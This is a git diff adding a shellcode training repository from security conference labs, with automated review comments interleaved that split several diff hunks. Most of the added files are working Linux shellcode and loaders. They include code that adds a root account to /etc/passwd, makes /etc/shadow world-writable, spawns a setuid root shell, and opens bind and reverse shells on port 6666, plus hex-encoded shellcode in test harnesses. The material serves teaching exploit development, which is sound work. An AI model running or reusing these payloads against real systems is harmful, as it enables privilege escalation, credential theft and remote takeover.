diff --git a/README b/README new file mode 100644 index 0000000..1772dd2 --- /dev/null +++ b/README @@ -0,0 +1,16 @@ + _____ __ __ ___ _ _ __ ___ ___ ___ _ ____ ____ + / ___/| | | / _]| | | | / ] / \ | \ / _] | | / || \ +( \_ | | | / [_ | | | | / / | || \ / [_ _____ | | | o || o ) + \__ || _ || _]| |___ | |___ / / | O || D || _] || |___ | || | + / \ || | || [_ | || / \_ | || || [_|_____|| || _ || O | + \ || | || || || \ || || || | | || | || | + \___||__|__||_____||_____||_____|\____| \___/ |_____||_____| |_____||__|__||_____| + + +Collection of Shellcode Lab Sessions at from different cons the past years. Consists of PDF Slides and Example codes. + +x86_32 - This is the Shellcode Lab for IA-32 saying 32Bit Intel CPUs +x86_64 - This is the Shellcode Lab for IA-64 saying 64Bit Intel CPUs + +Cheers +dash diff --git a/x86_32/0x1_SycallBasics/0x1_Shellcode-Lab_32Bit_Basics.pdf b/x86_32/0x1_SycallBasics/0x1_Shellcode-Lab_32Bit_Basics.pdf new file mode 100644 index 0000000..691a7b2 Binary files /dev/null and b/x86_32/0x1_SycallBasics/0x1_Shellcode-Lab_32Bit_Basics.pdf differ diff --git a/x86_32/0x1_SycallBasics/Example_Code/adduser_etc_passwd.asm b/x86_32/0x1_SycallBasics/Example_Code/adduser_etc_passwd.asm new file mode 100644 index 0000000..2c47e1c --- /dev/null +++ b/x86_32/0x1_SycallBasics/Example_Code/adduser_etc_passwd.asm 
@@ -0,0 +1,53 @@
+; shellcode lab @ hack4
+; dash
+
+BITS 32
+global _start
+
+_start:
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+
+mov eax, 5
+push ebx
+push 0x64777373
+push 0x61702f63
+push 0x74652f2f
+mov ebx, esp
+mov ecx, 0x401
+int 0x80
+
+; take filedescriptor
+xor ebx, ebx
+mov ebx, eax
+
+; write(f_open, line, 24)
+xor eax, eax
+xor ecx, ecx
+mov eax, 4
+
+push ecx
+push byte 0x0a
+push 0x68736162
+push 0x2f6e6962
+push 0x2f3a746f
+push 0x6f722f3a
+push 0x3a303a30
+push 0x3a494e73
+push 0x386b5a39
+push 0x65736d48
+push 0x42413a72
+push 0x336b6361
+push 0x68316f6e
+mov ecx, esp
+mov edx, 45
+int 0x80
+
+;close maybe?? ah forget that :>
+
+; exit(23)
+mov eax, 1
+mov ebx, 23
+int 0x80
+
diff --git a/x86_32/0x1_SycallBasics/Example_Code/ascii_converter.py b/x86_32/0x1_SycallBasics/Example_Code/ascii_converter.py
new file mode 100644
index 0000000..ef0e2e2
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/ascii_converter.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python
+#
+# ascii converter for shellcoding-lab at hack4
+# ~dash in 2014
+#
+
+import sys
+import binascii
+
+text = sys.argv[1]
+
+def usage():
+ print "./%s " % (sys.argv[0])
+if len(sys.argv)<2:
+ usage()
+ exit()
+
+val = binascii.hexlify(text[::-1])
+
+print "Stringlen: %d" % len(text)
+print "String: %s" % val
diff --git a/x86_32/0x1_SycallBasics/Example_Code/ascii_converter2.py b/x86_32/0x1_SycallBasics/Example_Code/ascii_converter2.py
new file mode 100644
index 0000000..b169d52
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/ascii_converter2.py
@@ -0,0 +1,29 @@
+#!/usr/bin/env python
+
+import sys
+import binascii
+
+text = sys.argv[1]
+
+def usage():
+ print "./%s " % (sys.argv[0])
+if len(sys.argv)<2:
+ usage()
+ exit()
+
+val = binascii.hexlify(text[::-1])
+
+print "Stringlen: %d" % len(text)
+print "String: %s" % val
+print
+for i in range(len(val)):
+ if i % 8 == 0:
+ print "push 0x",
+
+ print "\b%c" % val[i],
+ i=i+1
+ k = i % 8
+ if k == 0:
+ print
+
+
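Review bot: The comment `; write(f_open, line, 24)` does not match the call it labels: `mov edx, 45` passes a 45-byte length, and the data pushed below it is one `0x0a` dword plus eleven dwords, of which 45 bytes are written, so the `24` is stale. Suggest `; write(fd, line, 45)`. The header comment should also state that error checking on the open() result and the close() (acknowledged only by `;close maybe??`) are deliberately left out of this teaching example, so the reader does not take the omission as a pattern.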
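Review bot: `text = sys.argv[1]` runs before the `len(sys.argv)<2` check, so invoking the script with no argument raises IndexError and `usage()` is never reached; move the assignment below the check, i.e. place `text = sys.argv[1]` after `exit()`. ascii_converter2.py in the next hunk has the same ordering. `usage()` also prints `"./%s " % (sys.argv[0])`, which doubles the `./` when the script is run as `./ascii_converter.py`; `"usage: %s STRING"` (the original placeholder appears to have been stripped by the rendering) would be accurate.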
diff --git a/x86_32/0x1_SycallBasics/Example_Code/bad_setuid_shell.asm b/x86_32/0x1_SycallBasics/Example_Code/bad_setuid_shell.asm
new file mode 100644
index 0000000..558f180
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/bad_setuid_shell.asm
@@ -0,0 +1,21 @@
+global _start
+
+section .text
+_start:
+
+;setuid
+xor eax, eax
+mov ebx, eax
+mov eax, 11
+int 0x80
+
+;execve
+xor ecx, ecx
+push ecx
+push 0x69732f2f
+push 0x6e69622f
+mov ebx, esp
+mov edx, 0x00000000
+xor eax, eax
+mov eax, 11
+int 0x80
diff --git a/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_0bytes.asm b/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_0bytes.asm
new file mode 100644
index 0000000..e5b7007
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_0bytes.asm
@@ -0,0 +1,27 @@
+; shellcodelab@hack4
+; by dash
+
+BITS 32
+global _start
+
+_start:
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+
+;chmod
+mov ecx, 0x1ff ;0777
+push ebx ;null terminator
+push 0x776f6461 ;/etc/shadow
+push 0x68732f63
+push 0x74652f2f
+mov ebx, esp ;put the address of esp to ebx (shadow)
+mov eax, 15
+int 0x80
+
+;exit
+xor eax, eax
+xor ebx, ebx
+mov eax, 1
+int 0x80
+
diff --git a/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_no0.asm b/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_no0.asm
new file mode 100644
index 0000000..80127bc
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_no0.asm
@@ -0,0 +1,26 @@
+; shellcode-lab@hack4
+; by dash
+
+BITS 32
+global _start
+
+_start:
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+
+;chmod
+mov cx, 0x1ff ;0777
+push ebx ;null terminator
+push 0x776f6461 ;/etc/shadow
+push 0x68732f63
+push 0x74652f2f
+mov ebx, esp ;put the address of esp to ebx (shadow)
+mov al, 15
+int 0x80
+
+;exit
+xor eax, eax
+xor ebx, ebx
+mov al, 1
+int 0x80
diff --git a/x86_32/0x1_SycallBasics/Example_Code/crypt_des_tool.py b/x86_32/0x1_SycallBasics/Example_Code/crypt_des_tool.py
new file mode 100644
index 0000000..df68606
--- /dev/null
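Review bot: The block labelled `;setuid` loads `mov eax, 11`, the same syscall number the `;execve` block below uses, so either the comment or the immediate is wrong and the example does not do what its comment says. Since the file name announces a deliberately bad example, a header comment should spell out what the intended mistakes are, e.g. `; BAD example: wrong syscall number under ;setuid, and mov edx, 0x00000000 / mov eax, 11 embed null bytes — compare with execve_setuid.asm`, so the reader knows which lines are the lesson rather than an oversight. The file also lacks the `BITS 32` line the sibling examples carry; if it relies on the assembler default, say so.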
+++ b/x86_32/0x1_SycallBasics/Example_Code/crypt_des_tool.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python2
+#
+# crypt des tool for shellcoding lab at hack4
+# ~dash
+
+import sys
+import crypt
+
+def usage():
+ print "%s " % (sys.argv[0])
+
+if len(sys.argv)<2:
+ usage()
+ exit()
+
+password = sys.argv[1]
+pw = crypt.crypt(password,'AB')
+print "Password: %s" % pw
+
diff --git a/x86_32/0x1_SycallBasics/Example_Code/shell.c b/x86_32/0x1_SycallBasics/Example_Code/shell.c
new file mode 100644
index 0000000..ac0e9d0
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/shell.c
@@ -0,0 +1,20 @@
+/* shell.c
+ simple shell for shellcoding-lab at hack4 0x1
+ probably ripped somewhere
+ ~dash
+*/
+
+#include
+#include
+#include
+
+
+int main(){
+
+ char *args[2];
+
+ setuid(0);
+ args[0] = "/bin/sh";
+ args[1] = NULL;
+ execve(args[0], args, NULL);
+}
diff --git a/x86_32/0x1_SycallBasics/Example_Code/skeleton_mmap.c b/x86_32/0x1_SycallBasics/Example_Code/skeleton_mmap.c
new file mode 100644
index 0000000..d656446
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/skeleton_mmap.c
@@ -0,0 +1,26 @@
+#include
+#include
+
+char shellcode[] = "";
+
+int main(int argc, char **argv)
+{
+ // Allocate some read-write memory
+ void *mem = mmap(0, sizeof(shellcode), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+
+ // Copy the shellcode into the new memory
+ memcpy(mem, shellcode, sizeof(shellcode));
+
+ // Make the memory read-execute
+ mprotect(mem, sizeof(shellcode), PROT_READ|PROT_EXEC);
+
+ // Call the shellcode
+ int (*func)();
+ func = (int (*)())mem;
+ (int)(*func)();
+
+ // Now, if we managed to return here, it would be prudent to clean up the memory:
+ munmap(mem, sizeof(shellcode));
+
+ return 0;
+}
diff --git a/x86_32/0x1_SycallBasics/Example_Code/skeleton_oldstyle.c b/x86_32/0x1_SycallBasics/Example_Code/skeleton_oldstyle.c
new file mode 100644
index 0000000..cc3f9dc
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/skeleton_oldstyle.c
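Review bot: The return values of `mmap` and `mprotect` in skeleton_mmap.c are ignored: on failure `mem` is `MAP_FAILED` and `memcpy` writes through it, and a failed `mprotect` leaves the page non-executable so the indirect call faults with no diagnostic. Add `if (mem == MAP_FAILED) { perror("mmap"); return 1; }` after the `mmap` line and `if (mprotect(mem, sizeof(shellcode), PROT_READ|PROT_EXEC) != 0) { perror("mprotect"); return 1; }` in place of the unchecked call. `(int)(*func)();` casts the result only to discard it; `(void)func();` states that intent. The rendered `#include` lines show no header names, so whether the headers `perror` needs are already included cannot be confirmed from this view.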
@@ -0,0 +1,15 @@
+#include
+#include
+#include
+
+char shellcode[] = "";
+
+int main(void)
+{
+ int *ret;
+
+ printf("%d\n",strlen(shellcode));
+ ret = (int *)&ret+2;
+ *ret = (int)shellcode;
+return 0;
+}
diff --git a/x86_32/0x2_NetworkShells/0x2_ShellcodeLab_32Bit_NetworkShells.pdf b/x86_32/0x2_NetworkShells/0x2_ShellcodeLab_32Bit_NetworkShells.pdf
new file mode 100644
index 0000000..6c36c59
Binary files /dev/null and b/x86_32/0x2_NetworkShells/0x2_ShellcodeLab_32Bit_NetworkShells.pdf differ
diff --git a/x86_32/0x2_NetworkShells/bindshell_tcp/bindtcp.asm b/x86_32/0x2_NetworkShells/bindshell_tcp/bindtcp.asm
new file mode 100644
index 0000000..743b3bd
--- /dev/null
+++ b/x86_32/0x2_NetworkShells/bindshell_tcp/bindtcp.asm
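Review bot: `ret = (int *)&ret+2;` hard-codes a stack-frame layout (return address two ints above the local) that only holds for one particular compiler, optimisation level and 32-bit ABI, and the file has no comment saying which, so a reader building it with a different toolchain gets a silent failure rather than the demonstration. Document the assumption in the header, e.g. `/* assumes the frame layout of <COMPILER> <FLAGS> (fill in); not portable across compilers or optimisation levels */`. `printf("%d\n",strlen(shellcode))` also passes a `size_t` to `%d`; `%zu` is the matching specifier.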
@@ -0,0 +1,115 @@
+BITS 32
+global _start
+
+; basic bindshell for shellcode lab
+; by dash
+
+_start:
+; all syscalls /usr/include/i386-linux-gnu/asm/unistd_32.h
+; in difference we have to specify everything via socketcall
+; int socketcall(int call, unsigned long *args);
+; 66h / 102 is socketcall
+; /usr/include/linux/net.h
+
+; we need a socket, PF_INET, SOCK_STREAM, IPPROTO
+; its *not* sys/socket
+; go to /usr/include/bits/socket.h for domain
+; go to /usr/include/bits/socket_type.h for type
+; go to /usr/include/netinet/in.h for protocol
+
+; define socket
+xor eax, eax ; clean accumulator
+xor ebx, ebx
+xor edx, edx ; prepare edx for null
+mov al, 0x66
+mov bl, 0x1 ; SYS_SOCKET (/usr/include/linux/net.h)
+push edx ; IPPROTO == 0
+push 0x1 ; SOCK_STREAM == 1
+push 0x2 ; AF_INET / PF_INET == 2
+mov ecx,esp
+int 0x80
+
+; define bind
+; EAX has socket fd
+; /usr/include/linux/in.h
+; #define __SOCK_SIZE__ 16 /* sizeof(struct sockaddr) */
+; typedef unsigned short int sa_family_t;
+; struct sockaddr {
+; sa_family_t sa_family; unsigned short int 2 byte
+; char sa_data[14]; }
+
+; we do not want to specify a special ip address
+; we simply define 0.0.0.0 with nulled register
+xchg edi, eax
+push edx ; 0.0.0.0
+push word 0x0A1A ; PORT 6666
+push word 0x2 ; AF_INET, sin_family
+mov ecx, esp ; struct sockaddr *addr
+mov esi, ecx ; save struct sockaddr for later use in ESI
+push 0x10 ; socklen_t addrlen
+push ecx ; sockaddr *addr
+push edi ; socket fd
+mov ecx, esp
+mov bl,0x2 ; SYS_BIND
+xor eax, eax ; clean accumulator
+mov al,0x66 ; SYS_SOCKETCALL
+int 0x80
+
+; define listen
+; do socketcall
+; SYS_LISTEN 4
+; int listen(int sockfd, int backlog);
+;
+xor eax, eax
+mov al,0x66 ; SYS_SOCKETCALL
+mov bl,0x4 ; SYS_LISTEN, 1st Argument to SYS_SOCKETCALL
+push 0x1 ; backlog
+push edi ; sockfd
+mov ecx, esp ; 2nd argument to SYS_SOCKETCALL
+int 0x80
+
+; define accept
+; SYS_ACCEPT 5
+; int accept(int sockfd, struct sockaddr *addr,socklen_t *addrlen);
+; addr +
addrlen for client, but we dont care about that
+
+xor eax, eax ; clean accumulator
+mov al,0x66
+mov bl,0x5
+push edx ; flags, null
+push edx
+push edi
+mov ecx, esp
+int 0x80
+
+; define dup2
+; dup2 duplicate the FDs to the shell
+; new sockfd is in EAX
+; int dup2(int oldfd, int newfd);
+
+xor ecx, ecx
+mov cl,0x2
+xchg ebx,eax
+loop:
+xor eax, eax ; clean accumulator
+mov al,0x3F
+int 0x80
+dec ecx
+jns loop ; if ecx is *not* -1 (SIGN Flag)
+
+; define execve
+; spawning a shell
+; int execve(const char *filename, char *const argv[], char *const envp[]);
+;
+
+xor eax, eax ; clean accumulator
+xor esi, esi
+push esi
+mov edx, esp ; 3rd argument
+push esi ; NULL
+push 0x68732f6e ; n/sh
+push 0x69622f2f ; //bi
+mov ebx, esp ; 1st argument
+mov ecx, edx ; 2nd argument
+mov al,0xb
+int 0x80
diff --git a/x86_32/0x2_NetworkShells/bindshell_tcp/build_x86.sh b/x86_32/0x2_NetworkShells/bindshell_tcp/build_x86.sh
new file mode 100644
index 0000000..b51f6a9
--- /dev/null
+++ b/x86_32/0x2_NetworkShells/bindshell_tcp/build_x86.sh
@@ -0,0 +1,15 @@
+#!/bin/bash
+# easy build script for shellcode class
+
+if [ $# -ne 1 ];
+then
+echo "what is the name of the sourcefile, without .asm please"
+exit
+fi
+
+name=$1
+
+nasm -f elf32 $name.asm -o $name.o;ld -m elf_i386 -o $name $name.o
+md5sum $name
+ls -al $name
+echo "Done"
diff --git a/x86_32/0x2_NetworkShells/bindshell_tcp/testit.c b/x86_32/0x2_NetworkShells/bindshell_tcp/testit.c
new file mode 100644
index 0000000..7e800e4
--- /dev/null
+++ b/x86_32/0x2_NetworkShells/bindshell_tcp/testit.c
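Review bot: The comment `push edx ; flags, null` in the accept block mislabels the argument: the third parameter of `accept()` is `socklen_t *addrlen` (as the prototype quoted two lines above says), not flags; suggest `push edx ; addrlen = NULL`. `mov esi, ecx ; save struct sockaddr for later use in ESI` is also misleading, since `esi` is never read again before `xor esi, esi` in the execve block; either drop the instruction's comment or mark it `; (not used afterwards)`. Both comments appear verbatim in revtcp.asm in the reverseshell_tcp hunk. The header comment could also state that the file is a teaching example with no error handling on any of the socketcall results.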
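Review bot: The usage branch ends with a bare `exit`, which returns status 0, and `nasm ... ; ld ...` runs `ld` even when `nasm` failed, so a build error still prints `Done` and the md5sum of a stale binary. Use `exit 1` in the usage branch and chain the two steps: `nasm -f elf32 "$name.asm" -o "$name.o" && ld -m elf_i386 -o "$name" "$name.o"`, and quote `$name` in the `md5sum` and `ls` lines too so names with spaces do not split. The identical script is added again under reverseshell_tcp in the next hunk.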
@@ -0,0 +1,12 @@
+#include
+
+unsigned char shellcode[] = \
+"\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x01\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\x52\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x02\x31\xc0\xb0\x66\xcd\x80\x31\xc0\xb0\x66\xb3\x04\x6a\x01\x57\x89\xe1\xcd\x80\x31\xc0\xb0\x66\xb3\x05\x52\x52\x57\x89\xe1\xcd\x80\x31\xc9\xb1\x02\x93\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x31\xf6\x56\x89\xe2\x56\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xb0\x0b\xcd\x80";
+main()
+{
+printf("Shellcode Length: %d\n", sizeof(shellcode) - 1);
+int (*ret)() = (int(*)())shellcode;
+ret();
+}
+
+
diff --git a/x86_32/0x2_NetworkShells/reverseshell_tcp/build_x86.sh b/x86_32/0x2_NetworkShells/reverseshell_tcp/build_x86.sh
new file mode 100644
index 0000000..b51f6a9
--- /dev/null
+++ b/x86_32/0x2_NetworkShells/reverseshell_tcp/build_x86.sh
@@ -0,0 +1,15 @@
+#!/bin/bash
+# easy build script for shellcode class
+
+if [ $# -ne 1 ];
+then
+echo "what is the name of the sourcefile, without .asm please"
+exit
+fi
+
+name=$1
+
+nasm -f elf32 $name.asm -o $name.o;ld -m elf_i386 -o $name $name.o
+md5sum $name
+ls -al $name
+echo "Done"
diff --git a/x86_32/0x2_NetworkShells/reverseshell_tcp/revtcp.asm b/x86_32/0x2_NetworkShells/reverseshell_tcp/revtcp.asm
new file mode 100644
index 0000000..f4ef91d
--- /dev/null
+++ b/x86_32/0x2_NetworkShells/reverseshell_tcp/revtcp.asm
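Review bot: `main()` with no return type relies on implicit int, which C99 removed and current compilers reject by default, and `sizeof(shellcode) - 1` is a `size_t` printed with `%d`; write `int main(void)` and `%zu`. The rendered hunk shows `#include` with no header name, so whether `<stdio.h>` is actually included for `printf` cannot be confirmed from this view. The same harness shape is added in reverseshell_tcp/testit.c and, with `(int)strlen(code)`, in x86_64/Example_Code/skeleton.c; a one-line header comment stating what the harness expects of the build (the skeleton's `use -z execstack` remark) would help readers understand why it may fault on a default toolchain.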
@@ -0,0 +1,78 @@
+BITS 32
+global _start
+
+; basic reverseshell for shellcode lab
+; by dash
+
+_start:
+; all syscalls /usr/include/i386-linux-gnu/asm/unistd_32.h
+; in difference we have to specify everything via socketcall
+; int socketcall(int call, unsigned long *args);
+; 66h / 102 is socketcall
+; /usr/include/linux/net.h
+
+; we need a socket, PF_INET, SOCK_STREAM, IPPROTO
+; its *not* sys/socket
+; go to /usr/include/bits/socket.h for domain
+; go to /usr/include/bits/socket_type.h for type
+; go to /usr/include/netinet/in.h for protocol
+
+; define socket
+xor eax, eax ; clean accumulator
+xor ebx, ebx ; clean it as well
+xor edx, edx ; prepare edx for null
+mov al, 0x66 ; put 102 into AL, sys_socketcall
+mov bl, 0x1 ; SYS_SOCKET (/usr/include/linux/net.h)
+push edx ; IPPROTO == 0
+push 0x1 ; SOCK_STREAM == 1
+push 0x2 ; AF_INET / PF_INET == 2
+mov ecx,esp
+int 0x80
+
+; connect
+; call is basically the same as bind
+;xchg edi, eax
+push 0x01C7A8C0 ; 192.168.199.1
+push word 0x0A1A ; PORT 6666
+push word 0x2 ; AF_INET, sin_family
+mov ecx, esp ; struct sockaddr *addr
+mov esi, ecx ; save struct sockaddr for later use in ESI
+push 0x10 ; socklen_t addrlen
+push ecx ; sockaddr *addr
+push edi ; socket fd
+mov ecx, esp
+mov bl,0x3 ; SYS_CONNECT
+xor eax, eax ; clean accumulator
+mov al,0x66 ; SYS_SOCKETCALL
+int 0x80
+; define dup2
+; dup2 duplicate the FDs to the shell
+; new sockfd is in EAX
+; int dup2(int oldfd, int newfd);
+
+xor ecx, ecx
+mov cl,0x2
+mov ebx,edi
+loop:
+xor eax, eax ; clean accumulator
+mov al,0x3F
+int 0x80
+dec ecx
+jns loop ; if ecx is *not* -1 (SIGN Flag)
+
+; define execve
+; spawning a shell
+; int execve(const char *filename, char *const argv[], char *const envp[]);
+;
+
+xor eax, eax ; clean accumulator
+xor esi, esi
+push esi
+mov edx, esp ; 3rd argument
+push esi ; NULL
+push 0x68732f6e ; n/sh
+push 0x69622f2f ; //bi
+mov ebx, esp ; 1st argument
+mov ecx, edx ; 2nd argument
+mov al,0xb
+int 0x80
diff --git a/x86_32/0x2_NetworkShells/reverseshell_tcp/testit.c b/x86_32/0x2_NetworkShells/reverseshell_tcp/testit.c
new file mode 100644
index 0000000..ee39770
--- /dev/null
+++ b/x86_32/0x2_NetworkShells/reverseshell_tcp/testit.c
@@ -0,0 +1,12 @@
+#include
+
+unsigned char shellcode[] = \
+"\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x01\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\x52\x66\x68\x1b\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x02\x31\xc0\xb0\x66\xcd\x80\x68\xc0\xa8\xc7\x67\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x03\x31\xc0\xb0\x66\xcd\x80\x31\xc9\xb1\x02\x89\xfb\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x31\xf6\x56\x89\xe2\x56\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xb0\x0b\xcd\x80";
+main()
+{
+printf("Shellcode Length: %d\n", sizeof(shellcode) - 1);
+int (*ret)() = (int(*)())shellcode;
+ret();
+}
+
+
diff --git a/x86_64/Example_Code/8bit.asm b/x86_64/Example_Code/8bit.asm
new file mode 100644
index 0000000..cd3f45a
--- /dev/null
+++ b/x86_64/Example_Code/8bit.asm
@@ -0,0 +1,18 @@
+; 8 bit registers 'undocumented', test
+; dash@hack4.org
+; May 2016
+;
+; wikipedia, shellcode trainings no access to certain cpu registers in 8 bit mode
+; however, they are addressable
+; just adding right now a l to 16bit registers
+;
+
+BITS 64
+
+global _start
+_start:
+
+mov spl, 1
+mov bpl, 2
+mov sil, 3
+mov dil, 4
diff --git a/x86_64/Example_Code/byte_placement_r10.asm b/x86_64/Example_Code/byte_placement_r10.asm
new file mode 100644
index 0000000..caa4fa6
--- /dev/null
+++ b/x86_64/Example_Code/byte_placement_r10.asm
@@ -0,0 +1,22 @@
+; shellcode-lab64bit
+; dash@hack4.org
+; byte placements on 64 bit - example for new register r10
+BITS 64
+global _start
+
+_start:
+
+; former general purpose register
+sub r10, r10
+
+mov r10, 0x4142434445464748
+sub r10, r10
+
+mov r10d, 0x41424344
+sub r10d, r10d
+
+mov r10w, 0x4142
+sub r10w, r10w
+
+mov r10b,0x42
+sub r10b, r10b
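Review bot: The 8bit.asm header comment `; just adding right now a l to 16bit registers` misdescribes what the example shows: `spl`, `bpl`, `sil` and `dil` are the low 8 bits of `rsp`/`rbp`/`rsi`/`rdi`, made encodable by the REX prefix in 64-bit mode, not variants of 16-bit registers; suggest `; spl/bpl/sil/dil = low byte of rsp/rbp/rsi/rdi; need a REX prefix, so 64-bit mode only`. `_start` also ends after `mov dil, 4` with no exit syscall, so execution runs off the end of the code and the binary will most likely fault; if that is intentional (the file is an encoding demo, not a runnable program), a one-line comment saying so saves the reader a surprise. `mov spl, 1` additionally corrupts the stack pointer, which the same comment should call out.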
diff --git a/x86_64/Example_Code/byte_placement_rax.asm b/x86_64/Example_Code/byte_placement_rax.asm
new file mode 100644
index 0000000..a470393
--- /dev/null
+++ b/x86_64/Example_Code/byte_placement_rax.asm
@@ -0,0 +1,28 @@
+; shellcode-lab64bit
+; dash@hack4.org
+; byte placements on 64 bit - example
+BITS 64
+global _start
+
+_start:
+
+; former general purpose register, example
+; sub is used to clear out the register
+sub rax, rax
+
+mov rax, 0x4142434445464748
+sub rax, rax
+
+mov eax, 0x41424344
+sub eax, eax
+
+; address 16bit
+mov ax, 0x4142
+
+; overwrite the higher byte of ax
+; 0x4142 gets to 0x2d42
+mov ah,0x2d
+sub ah, ah
+
+mov al,0x41
+sub al, al
diff --git a/x86_64/Example_Code/clear_register.asm b/x86_64/Example_Code/clear_register.asm
new file mode 100644
index 0000000..b17424f
--- /dev/null
+++ b/x86_64/Example_Code/clear_register.asm
@@ -0,0 +1,22 @@
+; shellcode-lab64
+; dash@hack4.org
+;
+
+; some example to zero-out a register
+BITS 64
+global _start
+_start:
+
+xor rax, rax ; initial clearing - classic xor
+mov rax, 0xDEADBEEF
+sub rax, rax ; sub opcode
+
+mov rax, 0xF00DBABE
+xor rax, rax ; classic xor
+
+; check value of register and add or sub from that
+; let's assume 29A is in the register rcx
+sub rcx, rcx
+mov rcx, 0x29A
+sub rcx, 666
+; zero'd
diff --git a/x86_64/Example_Code/execve.asm b/x86_64/Example_Code/execve.asm
new file mode 100644
index 0000000..ba4b909
--- /dev/null
+++ b/x86_64/Example_Code/execve.asm
@@ -0,0 +1,21 @@
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+
+push rax ; null terminator for the string
+mov rbx, 0x68732f6e69622f2f ; //bin/sh backwards
+push rbx ;
+mov rdi, rsp ; move address from stack pointer to first argument
+
+push rax
+push rdi ; actually we would not need this one
+mov rsi, rsp ; move the address to the 2nd argument
+
+mov rdx, rax ; no envp necessary
+
+mov al,0x3B ; execve into rax
+
+syscall
diff --git a/x86_64/Example_Code/execve_setuid.asm b/x86_64/Example_Code/execve_setuid.asm
new file mode 100644
index 0000000..5cf7cab
--- /dev/null
+++ b/x86_64/Example_Code/execve_setuid.asm
@@ -0,0 +1,29 @@
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+push rax ; push the cleared register
+pop rdi ; pop the zer0z into 1st argument
+
+add al,0x69 ; setuid 105 or 0x69h
+syscall ; call setuid(0)
+
+
+xor rax, rax
+
+push rax ; null terminator for the string
+mov rbx, 0x68732f6e69622f2f ; //bin/sh backwards
+push rbx ;
+mov rdi, rsp ; move address from stack pointer to first argument
+
+push rax
+push rdi ; actually we would not need this one
+mov rsi, rsp ; move the address to the 2nd argument
+
+mov rdx, rax ; no envp necessary
+
+mov al,0x3B ; execve into rax
+
+syscall
diff --git a/x86_64/Example_Code/exit.asm b/x86_64/Example_Code/exit.asm
new file mode 100644
index 0000000..a038f6e
--- /dev/null
+++ b/x86_64/Example_Code/exit.asm
@@ -0,0 +1,14 @@
+; shellcode lab 64Bit
+; exit example as it should be ;)
+; dsah@hack4.org
+;
+BITS 64
+global _start
+
+_start:
+
+xor rax,rax
+xor rdx,rdx
+mov al,0x3C
+mov dil,4
+syscall
diff --git a/x86_64/Example_Code/exit_nulls.asm b/x86_64/Example_Code/exit_nulls.asm
new file mode 100644
index 0000000..2ed69e0
--- /dev/null
+++ b/x86_64/Example_Code/exit_nulls.asm
@@ -0,0 +1,16 @@
+; shellcode-lab 64Bit
+; dash@hack4.org
+; exit code with null bytes
+;
+
+BITS 64
+
+global _start
+
+_start:
+
+xor rax,rax
+xor rdx,rdx
+mov rax,0x3C
+mov rdx,4
+syscall
diff --git a/x86_64/Example_Code/kill.asm b/x86_64/Example_Code/kill.asm
new file mode 100644
index 0000000..9289643
--- /dev/null
+++ b/x86_64/Example_Code/kill.asm
@@ -0,0 +1,27 @@
+; shellcode-lab 64Bit
+; dash@hack4.org
+; kill + exit
+;
+
+
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+xor rdi, rdi
+xor rsi, rsi
+
+
+mov dil, 1368
+mov sil,9
+mov al, 62
+syscall
+
+xor rax, rax
+xor rdi, rdi
+
+add dil, 4
+mov al, 60
+syscall
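Review bot: In kill.asm, `mov dil, 1368` stores a value that does not fit in an 8-bit register: NASM keeps only the low byte (1368 = 0x558, so `dil` becomes 0x58 = 88) and, as far as I recall, emits an out-of-bounds warning, so the `kill()` is issued for pid 88 rather than the 1368 the source suggests. Either widen the operand to `mov di, 1368` (and note in a comment that this reintroduces a zero byte in the encoding, which the sibling exit_nulls.asm exists to illustrate) or keep the line and make the truncation the teaching point with `; 1368 does not fit in dil - the assembler truncates it to 0x58`. kill_noexit.asm in the next hunk uses `mov dil, 1` and is not affected. The `; exit` comment in exit.asm spells the author address `dsah@hack4.org`, which is presumably a typo for the address used in every other header.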
diff --git a/x86_64/Example_Code/kill_noexit.asm b/x86_64/Example_Code/kill_noexit.asm
new file mode 100644
index 0000000..cdf2db3
--- /dev/null
+++ b/x86_64/Example_Code/kill_noexit.asm
@@ -0,0 +1,18 @@
+; shellcode-lab64bit
+; dash@hack4.org
+; don't execute that as root, as long as adjusted
+;
+
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+xor rdi, rdi
+xor rsi, rsi
+
+mov dil, 1 ; you might not want to run that as root
+mov sil,9
+mov al, 62
+syscall
diff --git a/x86_64/Example_Code/push.asm b/x86_64/Example_Code/push.asm
new file mode 100644
index 0000000..15ee9ec
--- /dev/null
+++ b/x86_64/Example_Code/push.asm
@@ -0,0 +1,16 @@
+; shellcode-lab64
+; dash@hack4.org
